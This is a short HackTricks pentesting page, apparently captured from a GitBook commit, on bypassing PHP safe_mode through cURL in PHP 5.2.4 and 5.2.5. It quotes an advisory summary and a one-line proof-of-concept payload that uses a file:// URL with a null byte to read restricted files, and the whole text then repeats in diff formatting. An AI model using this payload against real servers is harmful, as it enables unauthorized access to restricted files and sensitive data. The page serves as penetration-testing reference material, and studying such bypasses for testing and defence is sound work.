hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md

# disable\_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL

## PHP 5.2.4 and 5.2.5 PHP cURL

From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)

```text
source: http://www.securityfocus.com/bid/27413/info
 
PHP cURL is prone to a 'safe mode' security-bypass vulnerability.
 
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.
 
The issue affects PHP 5.2.5 and 5.2.4. 
 
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00&quot;.__FILE__)));
```
GitBook: [master] 17 pages modified 2020-11-14 18:21:56 +00:00			`# disable\_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL`

			`## PHP 5.2.4 and 5.2.5 PHP cURL`

			`From [http://blog.safebuff.com/2016/05/06/disable-functions-bypass/](http://blog.safebuff.com/2016/05/06/disable-functions-bypass/)`

			```text
			`source: http://www.securityfocus.com/bid/27413/info`

			`PHP cURL is prone to a 'safe mode' security-bypass vulnerability.`

			`Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.`

			`The issue affects PHP 5.2.5 and 5.2.4.`

			`var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));`
			```